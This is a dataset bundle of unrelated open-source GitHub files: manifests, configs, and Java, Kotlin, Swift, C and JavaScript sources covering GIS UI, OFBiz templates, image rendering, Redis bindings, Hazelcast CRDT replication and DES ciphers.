Manifest-Version: 1.0 Bundle-ManifestVersion: 2 Bundle-Name: %pluginName Bundle-SymbolicName: org.locationtech.udig.ui; singleton:=true Bundle-Version: 2.3.0.qualifier Bundle-Activator: org.locationtech.udig.internal.ui.UiPlugin Bundle-Vendor: udig.refractions.net Bundle-Localization: plugin Eclipse-ExtensibleAPI: true Eclipse-BuddyPolicy: ext Require-Bundle: org.eclipse.ui;visibility:=reexport, org.eclipse.core.runtime, org.locationtech.udig.libs;visibility:=reexport, org.locationtech.udig.core;visibility:=reexport, org.eclipse.core.expressions;visibility:=reexport Bundle-ActivationPolicy: lazy Export-Package: org.locationtech.udig, org.locationtech.udig.aoi, org.locationtech.udig.internal.aoi;x-friends:="org.locationtech.udig.ui.tests,org.locationtech.udig.project.ui.tests", org.locationtech.udig.internal.ui;x-internal:=true, org.locationtech.udig.internal.ui.operations;x-internal:=true, org.locationtech.udig.ui, org.locationtech.udig.ui.action, org.locationtech.udig.ui.aoi, org.locationtech.udig.ui.export, org.locationtech.udig.ui.filter, org.locationtech.udig.ui.graphics, org.locationtech.udig.ui.internal;x-internal:=true, org.locationtech.udig.ui.operations, org.locationtech.udig.ui.palette, org.locationtech.udig.ui.preferences, org.locationtech.udig.ui.properties Import-Package: com.google.common.base;version="12.0.0", net.miginfocom.swt;version="[3.7.0,3.8.0)"
{ "pile_set_name": "Github" }
<#-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <#assign docLangAttr = locale.toString()?replace("_", "-")> <#assign initialLocale = locale.toString()> <#assign langDir = "ltr"> <#if "ar.iw"?contains(docLangAttr?substring(0, 2))> <#assign langDir = "rtl"> </#if> <html lang="${docLangAttr}" dir="${langDir}" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>${title!}</title> <#if layoutSettings.shortcutIcon?has_content> <#assign shortcutIcon = layoutSettings.shortcutIcon/> <#elseif layoutSettings.VT_SHORTCUT_ICON?has_content> <#assign shortcutIcon = layoutSettings.VT_SHORTCUT_ICON /> </#if> <#if shortcutIcon?has_content> <link rel="shortcut icon" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+".ico"}</@ofbizContentUrl>" type="image/x-icon"> <link rel="icon" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+".png"}</@ofbizContentUrl>" type="image/png"> <link rel="icon" sizes="32x32" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+"-32.png"}</@ofbizContentUrl>" type="image/png"> <link rel="icon" sizes="64x64" href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+"-64.png"}</@ofbizContentUrl>" type="image/png"> <link rel="icon" sizes="96x96" 
href="<@ofbizContentUrl>${StringUtil.wrapString(shortcutIcon)+"-96.png"}</@ofbizContentUrl>" type="image/png"> </#if> <#if layoutSettings.javaScripts?has_content> <#--layoutSettings.javaScripts is a list of java scripts. --> <#-- use a Set to make sure each javascript is declared only once, but iterate the list to maintain the correct order --> <#assign javaScriptsSet = Static["org.apache.ofbiz.base.util.UtilMisc"].toSet(layoutSettings.javaScripts)/> <#list layoutSettings.javaScripts as javaScript> <#if javaScriptsSet.contains(javaScript)> <#assign nothing = javaScriptsSet.remove(javaScript)/> <script src="<@ofbizContentUrl>${StringUtil.wrapString(javaScript)}</@ofbizContentUrl>" type="application/javascript"></script> </#if> </#list> </#if> <#if layoutSettings.styleSheets?has_content> <#list layoutSettings.styleSheets as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.VT_STYLESHEET?has_content> <#list layoutSettings.VT_STYLESHEET as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.VT_HELPSTYLESHEET?has_content && lookupType?has_content> <#list layoutSettings.VT_HELPSTYLESHEET as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.rtlStyleSheets?has_content && "rtl" == langDir> <#list layoutSettings.rtlStyleSheets as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <#if layoutSettings.VT_RTL_STYLESHEET?has_content && "rtl" == langDir> <#list layoutSettings.VT_RTL_STYLESHEET as styleSheet> <link rel="stylesheet" href="<@ofbizContentUrl>${styleSheet}</@ofbizContentUrl>" type="text/css"/> </#list> </#if> <script type="application/javascript"> // This code inserts the value lookedup by a popup window back 
into the associated form element var re_id = new RegExp('id=(\\d+)'); var num_id = (re_id.exec(String(window.location)) ? new Number(RegExp.$1) : 0); var obj_caller = (window.opener ? window.opener.lookups[num_id] : null); if (obj_caller == null) obj_caller = window.opener; // function passing selected value to calling window function set_multivalues(value) { obj_caller.target.value = value; var thisForm = obj_caller.target.form; var evalString = ""; if (arguments.length > 2) { for (var i = 1; i < arguments.length; i = i + 2) { evalString = "setSourceColor(thisForm." + arguments[i] + ")"; eval(evalString); evalString = "thisForm." + arguments[i] + ".value='" + arguments[i + 1] + "'"; eval(evalString); } } window.close(); } </script> </head> <body style="background-color: WHITE;">
{ "pile_set_name": "Github" }
oro: checkout: open_order: plural_label: Open Orders billing_address.label: Billing Address shipping_address.label: Shipping Address
{ "pile_set_name": "Github" }
import Foundation
import RxSwift
import Keys

/// Admin-only diagnostics screen for the CardFlight card reader.
/// Subscribes to the reader's status stream and appends every status
/// message, error, and swiped-card summary to an on-screen log view.
class AdminCardTestingViewController: UIViewController {
    // Cardflight API credentials generated by the Keys pod.
    lazy var keys = EidolonKeys()

    // Created in viewDidLoad; implicitly unwrapped because the view
    // controller is unusable before then.
    var cardHandler: CardHandler!

    @IBOutlet weak var logTextView: UITextView!

    override func viewDidLoad() {
        super.viewDidLoad()

        self.logTextView.text = ""

        // Choose staging vs production CardFlight credentials based on
        // the app-wide environment flag.
        if AppSetup.sharedState.useStaging {
            cardHandler = CardHandler(apiKey: self.keys.cardflightStagingAPIClientKey, accountToken: self.keys.cardflightStagingMerchantAccountToken)
        } else {
            cardHandler = CardHandler(apiKey: self.keys.cardflightProductionAPIClientKey, accountToken: self.keys.cardflightProductionMerchantAccountToken)
        }

        cardHandler.cardStatus
            .subscribe { (event) in
                switch event {
                case .next(let message):
                    // Plain status updates are logged verbatim.
                    self.log("\(message)")
                case .error(let error):
                    // NOTE(review): errors appear to be non-fatal here — we log and
                    // keep the subscription; confirm CardHandler re-emits after error.
                    self.log("\n====Error====\n\(error)\nThe card reader may have become disconnected.\n\n")
                    if self.cardHandler.card != nil {
                        self.log("==\n\(self.cardHandler.card!)\n\n")
                    }
                case .completed:
                    guard let card = self.cardHandler.card else {
                        // Restarts the card reader
                        self.cardHandler.startSearching()
                        return
                    }

                    // Completed with a card: log holder name, last four digits,
                    // and the tokenized card reference.
                    let cardDetails = "Card: \(card.cardInfo.cardholderName ?? "") - \(card.cardInfo.lastFour ?? "") \n \(card.token)"
                    self.log(cardDetails)
                }
            }
            .disposed(by: rx.disposeBag)
    }

    override func viewWillDisappear(_ animated: Bool) {
        super.viewWillDisappear(animated)
        // Stop talking to the reader when the screen goes away.
        cardHandler.end()
    }

    override func viewDidAppear(_ animated: Bool) {
        super.viewDidAppear(animated)
        // Begin scanning for a connected reader once the view is visible.
        cardHandler.startSearching()
    }

    /// Appends `string` to the log view on a new line.
    func log(_ string: String) {
        self.logTextView.text = "\(self.logTextView.text ?? "")\n\(string)"
    }

    @IBAction func backTapped(_ sender: AnyObject) {
        _ = navigationController?.popViewController(animated: true)
    }
}
{ "pile_set_name": "Github" }
/* * Typelib for pstorec * * Copyright 2009 Alexandre Julliard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA */ #pragma makedep regtypelib #include "pstore.idl"
{ "pile_set_name": "Github" }
package arrow.meta.quotes.scope.plugins

import arrow.meta.CliPlugin
import arrow.meta.Meta
import arrow.meta.invoke
import arrow.meta.phases.CompilerContext
import arrow.meta.quotes.Transform
import arrow.meta.quotes.returnExpression

/**
 * Arrow Meta compiler plugin used to exercise the `returnExpression`
 * quote scope: it registers a single CLI plugin that intercepts every
 * compilation.
 */
open class ReturnExpressionPlugin : Meta {
  override fun intercept(ctx: CompilerContext): List<CliPlugin> =
    listOf(
      returnExpressionPlugin
    )
}

/**
 * Quote transformation that matches every `return` expression
 * (the `{ true }` predicate) and replaces it with itself via
 * `identity()` — a deliberate no-op, presumably so tests can verify
 * that the quote scope round-trips source unchanged.
 */
val Meta.returnExpressionPlugin: CliPlugin
  get() = "Return Expression Scope Plugin" {
    meta(
      returnExpression(this, { true }) { expression ->
        Transform.replace(
          replacing = expression,
          newDeclaration = identity()
        )
      }
    )
  }
{ "pile_set_name": "Github" }
/** * Copyright (c) 2011, The University of Southampton and the individual contributors. * All rights reserved. * * Redistribution and use in source and binary forms, with or without modification, * are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * * Neither the name of the University of Southampton nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ package org.openimaj.image; import java.awt.geom.AffineTransform; import java.awt.image.BufferedImage; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.OutputStreamWriter; import java.util.Comparator; import org.apache.batik.svggen.SVGGraphics2DIOException; import org.apache.batik.transcoder.TranscoderException; import org.apache.batik.transcoder.TranscoderInput; import org.apache.batik.transcoder.TranscoderOutput; import org.apache.batik.transcoder.image.ImageTranscoder; import org.apache.batik.transcoder.image.PNGTranscoder; import org.openimaj.image.colour.RGBColour; import org.openimaj.image.renderer.ImageRenderer; import org.openimaj.image.renderer.RenderHints; import org.openimaj.image.renderer.SVGRenderHints; import org.openimaj.image.renderer.SVGRenderer; import org.openimaj.math.geometry.point.Point2dImpl; import org.openimaj.math.geometry.shape.Rectangle; public class SVGImage extends Image<Float[], SVGImage> { private SVGRenderer renderer; /** * @param hints */ public SVGImage(SVGRenderHints hints) { this.renderer = new SVGRenderer(null, hints); this.renderer.setImage(this); } private SVGImage() { // TODO Auto-generated constructor stub } /** * Construct an empty SVG-backed image of the given size * * @param w * the width * @param h * the height */ public SVGImage(int w, int h) { this(new SVGRenderHints(w, h)); } @Override public SVGImage abs() { return this; } @Override public SVGImage addInplace(Image<?, ?> im) { if (!(im instanceof SVGImage)) { this.renderer.drawOIImage(im); } else { this.renderer.drawImage((SVGImage) im, 0, 0); } return null; } @Override public SVGImage addInplace(Float[] num) { return this; } @Override public SVGImage clip(Float[] min, Float[] max) { return this; } @Override public SVGImage clipMax(Float[] thresh) { return this; } @Override public SVGImage clipMin(Float[] thresh) { return this; } @Override public SVGImage clone() { final SVGImage svgImage = new 
SVGImage(); svgImage.renderer = new SVGRenderer(svgImage, this.renderer.getGraphics2D().create()); return svgImage; } @Override public SVGRenderer createRenderer() { return this.renderer; } @Override public ImageRenderer<Float[], SVGImage> createRenderer(RenderHints options) { return this.renderer; } @Override public SVGImage divideInplace(Image<?, ?> im) { throw new UnsupportedOperationException(); } @Override public SVGImage divideInplace(Float[] val) { throw new UnsupportedOperationException(); } @Override public SVGImage extractROI(int x, int y, SVGImage img) { img.renderer = new SVGRenderer(img, img.renderer.getRenderHints(), this.renderer.getGraphics2D().create(x, y, img.getWidth(), img.getHeight())); return img; } @Override public SVGImage extractROI(int x, int y, int w, int h) { final SVGImage ret = new SVGImage(w, h); return extractROI(x, y, ret); } @Override public SVGImage extractCentreSubPix(float cx, float cy, SVGImage out) { return extractCenter((int) cx, (int) cy, out.getWidth(), out.getHeight()); } @Override public SVGImage fill(Float[] colour) { final SVGRenderHints hint = (SVGRenderHints) this.renderer.getRenderHints(); this.renderer = new SVGRenderer(hint); this.renderer.drawShapeFilled(this.getBounds(), colour); return this; } @Override public SVGImage flipX() { final AffineTransform tx = AffineTransform.getScaleInstance(-1, 1); tx.translate(this.getWidth(), 0); this.renderer.getGraphics2D().transform(tx); return this; } @Override public SVGImage flipY() { final AffineTransform tx = AffineTransform.getScaleInstance(1, -1); tx.translate(0, -this.getHeight()); this.renderer.getGraphics2D().transform(tx); return this; } @Override public Rectangle getContentArea() { return new Rectangle(0, 0, getWidth(), getHeight()); } @Override public SVGImage getField(org.openimaj.image.Image.Field f) { throw new UnsupportedOperationException(); } @Override public SVGImage getFieldCopy(org.openimaj.image.Image.Field f) { throw new UnsupportedOperationException(); 
} @Override public SVGImage getFieldInterpolate(org.openimaj.image.Image.Field f) { throw new UnsupportedOperationException(); } @Override public int getHeight() { return this.renderer.getGraphics2D().getSVGCanvasSize().height; } @Override public Float[] getPixel(int x, int y) { throw new UnsupportedOperationException(); } @Override public Comparator<? super Float[]> getPixelComparator() { throw new UnsupportedOperationException(); } @Override public Float[] getPixelInterp(double x, double y) { throw new UnsupportedOperationException(); } @Override public Float[] getPixelInterp(double x, double y, Float[] backgroundColour) { throw new UnsupportedOperationException(); } @Override public int getWidth() { return this.renderer.getGraphics2D().getSVGCanvasSize().width; } @Override public SVGImage internalCopy(SVGImage im) { this.renderer = im.renderer.clone(); this.renderer.setImage(this); return this; } @Override public SVGImage internalAssign(SVGImage im) { this.renderer = im.renderer; return this; } @Override public SVGImage internalAssign(int[] pixelData, int width, int height) { throw new UnsupportedOperationException(); } @Override public SVGImage inverse() { throw new UnsupportedOperationException(); } @Override public Float[] max() { throw new UnsupportedOperationException(); } @Override public Float[] min() { throw new UnsupportedOperationException(); } @Override public SVGImage multiplyInplace(Image<?, ?> im) { throw new UnsupportedOperationException(); } @Override public SVGImage multiplyInplace(Float[] num) { throw new UnsupportedOperationException(); } @Override public SVGImage newInstance(int width, int height) { return new SVGImage(width, height); } @Override public SVGImage normalise() { throw new UnsupportedOperationException(); } @Override public void setPixel(int x, int y, Float[] val) { this.renderer.drawPoint(new Point2dImpl(x, y), val, 1); } @Override public SVGImage subtractInplace(Image<?, ?> im) { throw new UnsupportedOperationException(); } 
/** Not supported for vector images. */
	@Override
	public SVGImage subtractInplace(Float[] num) {
		throw new UnsupportedOperationException();
	}

	/** Not supported: thresholding requires raster pixel values. */
	@Override
	public SVGImage threshold(Float[] thresh) {
		throw new UnsupportedOperationException();
	}

	/**
	 * Batik transcoder that captures the rasterised SVG as an in-memory
	 * ARGB BufferedImage instead of writing it to an output stream.
	 */
	private static class BufferedImageTranscoder extends ImageTranscoder {
		// Last image produced by a transcode() call; null until then.
		private BufferedImage img;

		@Override
		public BufferedImage createImage(int w, int h) {
			final BufferedImage bi = new BufferedImage(w, h, BufferedImage.TYPE_INT_ARGB);
			return bi;
		}

		@Override
		public void writeImage(BufferedImage img, TranscoderOutput arg1) throws TranscoderException {
			// Capture rather than write: keep the rendered raster for retrieval.
			this.img = img;
		}

		public BufferedImage getBufferedImage() {
			return this.img;
		}
	}

	/** Rasterises the SVG and returns the result as a byte image. */
	@Override
	public byte[] toByteImage() {
		final MBFImage mbf = createMBFImage();
		return mbf.toByteImage();
	}

	/**
	 * Rasterises this SVG image into a multi-band float image by serialising
	 * the SVG document and transcoding it at the current canvas size.
	 */
	public MBFImage createMBFImage() {
		final BufferedImageTranscoder t = new BufferedImageTranscoder();
		t.addTranscodingHint(PNGTranscoder.KEY_WIDTH, (float) getWidth());
		t.addTranscodingHint(PNGTranscoder.KEY_HEIGHT, (float) getHeight());
		final ByteArrayOutputStream baos = new ByteArrayOutputStream();
		try {
			// Serialise the SVG document to bytes, then feed it back to Batik.
			this.renderer.write(new OutputStreamWriter(baos));
			baos.flush();
			baos.close();
			final byte[] barr = baos.toByteArray();
			final TranscoderInput input = new TranscoderInput(new ByteArrayInputStream(barr));
			t.transcode(input, null);
		} catch (final SVGGraphics2DIOException e) {
			// NOTE(review): exception silently swallowed; a failed write leaves
			// the transcoder empty and the line below may NPE — consider logging.
		} catch (final IOException e) {
			// NOTE(review): silently swallowed — see above.
		} catch (final TranscoderException e) {
			// NOTE(review): silently swallowed — see above.
		}
		final MBFImage mbf = ImageUtilities.createMBFImage(t.getBufferedImage(), true);
		return mbf;
	}

	/** Rasterises the SVG and returns the packed-ARGB pixel array. */
	@Override
	public int[] toPackedARGBPixels() {
		final MBFImage mbf = createMBFImage();
		return mbf.toPackedARGBPixels();
	}

	/**
	 * "Zeroes" the image by replacing the renderer with a fresh one (same
	 * render hints) and filling the bounds with black.
	 */
	@Override
	public SVGImage zero() {
		final SVGRenderHints hint = (SVGRenderHints) this.renderer.getRenderHints();
		this.renderer = new SVGRenderer(hint);
		this.renderer.drawShapeFilled(this.getBounds(), RGBColour.BLACK);
		return this;
	}

	/** Not supported for vector images. */
	@Override
	public SVGImage overlayInplace(SVGImage image, int x, int y) {
		throw new UnsupportedOperationException();
	}

	/** Not supported: replacement requires per-pixel access. */
	@Override
	public SVGImage replace(Float[] target, Float[] replacement) {
		throw new UnsupportedOperationException();
	}
}
{ "pile_set_name": "Github" }
#ifndef __HIREDIS_LIBUV_H__ #define __HIREDIS_LIBUV_H__ #include <uv.h> #include "../hiredis.h" #include "../async.h" #include <string.h> typedef struct redisLibuvEvents { redisAsyncContext* context; uv_poll_t handle; int events; } redisLibuvEvents; int redisLibuvAttach(redisAsyncContext*, uv_loop_t*); static void redisLibuvPoll(uv_poll_t* handle, int status, int events) { redisLibuvEvents* p = (redisLibuvEvents*)handle->data; if (status != 0) { return; } if (events & UV_READABLE) { redisAsyncHandleRead(p->context); } if (events & UV_WRITABLE) { redisAsyncHandleWrite(p->context); } } static void redisLibuvAddRead(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events |= UV_READABLE; uv_poll_start(&p->handle, p->events, redisLibuvPoll); } static void redisLibuvDelRead(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events &= ~UV_READABLE; if (p->events) { uv_poll_start(&p->handle, p->events, redisLibuvPoll); } else { uv_poll_stop(&p->handle); } } static void redisLibuvAddWrite(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events |= UV_WRITABLE; uv_poll_start(&p->handle, p->events, redisLibuvPoll); } static void redisLibuvDelWrite(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; p->events &= ~UV_WRITABLE; if (p->events) { uv_poll_start(&p->handle, p->events, redisLibuvPoll); } else { uv_poll_stop(&p->handle); } } static void on_close(uv_handle_t* handle) { redisLibuvEvents* p = (redisLibuvEvents*)handle->data; free(p); } static void redisLibuvCleanup(void *privdata) { redisLibuvEvents* p = (redisLibuvEvents*)privdata; uv_close((uv_handle_t*)&p->handle, on_close); } static int redisLibuvAttach(redisAsyncContext* ac, uv_loop_t* loop) { redisContext *c = &(ac->c); if (ac->ev.data != NULL) { return REDIS_ERR; } ac->ev.addRead = redisLibuvAddRead; ac->ev.delRead = redisLibuvDelRead; ac->ev.addWrite = redisLibuvAddWrite; ac->ev.delWrite = redisLibuvDelWrite; ac->ev.cleanup = 
redisLibuvCleanup; redisLibuvEvents* p = (redisLibuvEvents*)malloc(sizeof(*p)); if (!p) { return REDIS_ERR; } memset(p, 0, sizeof(*p)); if (uv_poll_init(loop, &p->handle, c->fd) != 0) { return REDIS_ERR; } ac->ev.data = p; p->handle.data = p; p->context = ac; return REDIS_OK; } #endif
{ "pile_set_name": "Github" }
/* * Copyright (c) 2008-2020, Hazelcast, Inc. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.hazelcast.internal.crdt; import com.hazelcast.cluster.impl.VectorClock; import com.hazelcast.config.CRDTReplicationConfig; import com.hazelcast.cluster.Member; import com.hazelcast.logging.ILogger; import com.hazelcast.spi.impl.NodeEngine; import com.hazelcast.spi.impl.operationservice.OperationService; import java.util.ArrayList; import java.util.Collection; import java.util.List; import java.util.Map; import static com.hazelcast.cluster.memberselector.MemberSelectors.DATA_MEMBER_SELECTOR; /** * Task responsible for replicating the CRDT states for all * {@link CRDTReplicationAwareService}. This task is a runnable that is * meant to be executed by an executor. The task may be interrupted in * which case some CRDT states may not be replicated. 
*/
class CRDTReplicationTask implements Runnable {
    private final NodeEngine nodeEngine;
    // Upper bound on the number of members replicated to in a single run.
    private final int maxTargets;
    private final ILogger logger;
    private final CRDTReplicationMigrationService replicationMigrationService;
    // Rotating offset into the viable-target list; advanced after each run so
    // successive runs replicate to different subsets of the cluster.
    private int lastTargetIndex;

    CRDTReplicationTask(NodeEngine nodeEngine, int maxTargets,
                        CRDTReplicationMigrationService replicationMigrationService) {
        this.nodeEngine = nodeEngine;
        this.logger = nodeEngine.getLogger(getClass());
        this.maxTargets = maxTargets;
        this.replicationMigrationService = replicationMigrationService;
    }

    @Override
    public void run() {
        // Lite members hold no CRDT state, so there is nothing to replicate.
        if (nodeEngine.getLocalMember().isLiteMember()) {
            return;
        }
        try {
            final Collection<Member> viableTargets = getNonLocalReplicaAddresses();
            if (viableTargets.size() == 0) {
                return;
            }
            // Pick the next "window" of targets, then advance the rotation by
            // the number actually picked.
            final Member[] targets = pickTargets(viableTargets, lastTargetIndex, maxTargets);
            lastTargetIndex = (lastTargetIndex + targets.length) % viableTargets.size();
            for (CRDTReplicationAwareService service : replicationMigrationService.getReplicationServices()) {
                for (Member target : targets) {
                    replicate(service, target);
                }
            }
        } finally {
            // we left the interrupt status unchanged while replicating so we clear it here
            Thread.interrupted();
        }
    }

    /**
     * Return the list of non-local CRDT replicas in the cluster.
     */
    private List<Member> getNonLocalReplicaAddresses() {
        final Collection<Member> dataMembers = nodeEngine.getClusterService().getMembers(DATA_MEMBER_SELECTOR);
        final ArrayList<Member> nonLocalDataMembers = new ArrayList<Member>(dataMembers);
        nonLocalDataMembers.remove(nodeEngine.getLocalMember());
        return nonLocalDataMembers;
    }

    /**
     * Performs replication of a {@link CRDTReplicationAwareService} to the
     * given target. The service may optimise the returned operation based on
     * the target member and the previous successful replication operations.
     *
     * @param service the service to replicate
     * @param target  the target to replicate to
     * @see CRDTReplicationAwareService
     */
    private void replicate(CRDTReplicationAwareService service, Member target) {
        // Honour interruption, but leave clearing the flag to run()'s finally block.
        if (Thread.currentThread().isInterrupted()) {
            return;
        }
        final int targetIndex = getDataMemberListIndex(target);
        // Vector clocks acknowledged by this target in earlier rounds; lets the
        // service prepare a delta instead of the full state.
        final Map<String, VectorClock> lastSuccessfullyReplicatedClocks =
                replicationMigrationService.getReplicatedVectorClocks(service.getName(), target.getUuid());
        final OperationService operationService = nodeEngine.getOperationService();
        final CRDTReplicationContainer replicationOperation =
                service.prepareReplicationOperation(lastSuccessfullyReplicatedClocks, targetIndex);
        // A null container means the target is already up to date.
        if (replicationOperation == null) {
            logger.finest("Skipping replication of " + service.getName() + " for target " + target);
            return;
        }
        try {
            logger.finest("Replicating " + service.getName() + " to " + target);
            operationService.invokeOnTarget(null, replicationOperation.getOperation(), target.getAddress()).joinInternal();
            // Record what was acknowledged so the next round sends only a delta.
            replicationMigrationService.setReplicatedVectorClocks(service.getName(), target.getUuid(),
                    replicationOperation.getVectorClocks());
        } catch (Exception e) {
            // A failed round is retried implicitly on the next scheduled run.
            if (logger.isFineEnabled()) {
                logger.fine("Failed replication of " + service.getName() + " for target " + target, e);
            } else {
                logger.info("Failed replication of " + service.getName() + " for target " + target);
            }
        }
    }

    /**
     * Returns the index of the {@code member} in the membership list containing
     * only data members.
     *
     * @param member the member to find
     */
    private int getDataMemberListIndex(Member member) {
        final Collection<Member> dataMembers = nodeEngine.getClusterService().getMembers(DATA_MEMBER_SELECTOR);
        int index = -1;
        for (Member dataMember : dataMembers) {
            index++;
            if (dataMember.equals(member)) {
                return index;
            }
        }
        // Not found: returns the last index rather than failing.
        return index;
    }

    /**
     * Picks up to {@code maxTargets} from the provided {@code members}
     * collection. The {@code startingIndex} parameter determines which
     * subset of members can be returned. By increasing the parameter by the
     * size of the returned array you can imitate a "sliding window", meaning
     * that each time it is invoked it will rotate through a list of viable
     * targets and return a sub-collection based on the previous method call.
     * A member may be skipped if the collection of viable targets changes
     * between two invocations but if the collection does not change,
     * eventually all targets should be returned by this method.
     *
     * @param members       a collection of members to choose from
     * @param startingIndex the index of the first returned member
     * @param maxTargets    the maximum number of members to return
     * @return the chosen targets
     * @see CRDTReplicationConfig#getMaxConcurrentReplicationTargets()
     */
    private Member[] pickTargets(Collection<Member> members, int startingIndex, int maxTargets) {
        final Member[] viableTargetArray = members.toArray(new Member[0]);
        final Member[] pickedTargets = new Member[Math.min(maxTargets, viableTargetArray.length)];
        for (int i = 0; i < pickedTargets.length; i++) {
            startingIndex = (startingIndex + 1) % viableTargetArray.length;
            pickedTargets[i] = viableTargetArray[startingIndex];
        }
        return pickedTargets;
    }
}
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8" ?> <phpdox xmlns="http://xml.phpdox.net/config"> <project name="PHPUnit" source="src" workdir="build/phpdox"> <collector publiconly="false"> <include mask="*.php" /> </collector> <generator output="build"> <enrich base="${basedir}/build/logs"> <source type="build" /> <source type="git" /> <source type="phploc" /> <source type="checkstyle" /> <source type="pmd" /> </enrich> <build engine="html" enabled="true" output="api"> <file extension="html" /> </build> </generator> </project> </phpdox>
{ "pile_set_name": "Github" }
--- linux-2.6.32/include/scsi/Kbuild +++ linux-2.6.32/include/scsi/Kbuild @@ -1,3 +1,5 @@ +header-y += sg.h +header-y += scsi_ioctl.h header-y += scsi.h header-y += scsi_netlink.h header-y += scsi_netlink_fc.h
{ "pile_set_name": "Github" }
var CipherBase = require('cipher-base')
var des = require('des.js')
var inherits = require('inherits')

// OpenSSL-style cipher names mapped to des.js mode factories.
var modes = {
  'des-ede3-cbc': des.CBC.instantiate(des.EDE),
  'des-ede3': des.EDE,
  'des-ede-cbc': des.CBC.instantiate(des.EDE),
  'des-ede': des.EDE,
  'des-cbc': des.CBC.instantiate(des.DES),
  'des-ecb': des.DES
}
// Common aliases.
modes.des = modes['des-cbc']
modes.des3 = modes['des-ede3-cbc']

module.exports = DES
inherits(DES, CipherBase)

/**
 * DES/3DES cipher stream built on des.js, exposed through cipher-base.
 *
 * @param {Object} opts
 * @param {string} opts.mode       cipher name, e.g. 'des-ede3-cbc'
 * @param {Buffer} opts.key        raw key material
 * @param {Buffer} opts.iv         initialisation vector (CBC modes)
 * @param {boolean} [opts.decrypt] true to decrypt instead of encrypt
 */
function DES (opts) {
  CipherBase.call(this)
  var modeName = opts.mode.toLowerCase()
  var mode = modes[modeName]
  var type = opts.decrypt ? 'decrypt' : 'encrypt'
  var key = opts.key
  // Two-key EDE expands K1||K2 to K1||K2||K1 so the 3-key core can be reused.
  if (modeName === 'des-ede' || modeName === 'des-ede-cbc') {
    key = Buffer.concat([key, key.slice(0, 8)])
  }
  var iv = opts.iv
  this._des = mode.create({
    key: key,
    iv: iv,
    type: type
  })
}

DES.prototype._update = function (data) {
  // Buffer.from replaces the deprecated, unsafe `new Buffer()` constructor.
  return Buffer.from(this._des.update(data))
}

DES.prototype._final = function () {
  return Buffer.from(this._des.final())
}
{ "pile_set_name": "Github" }
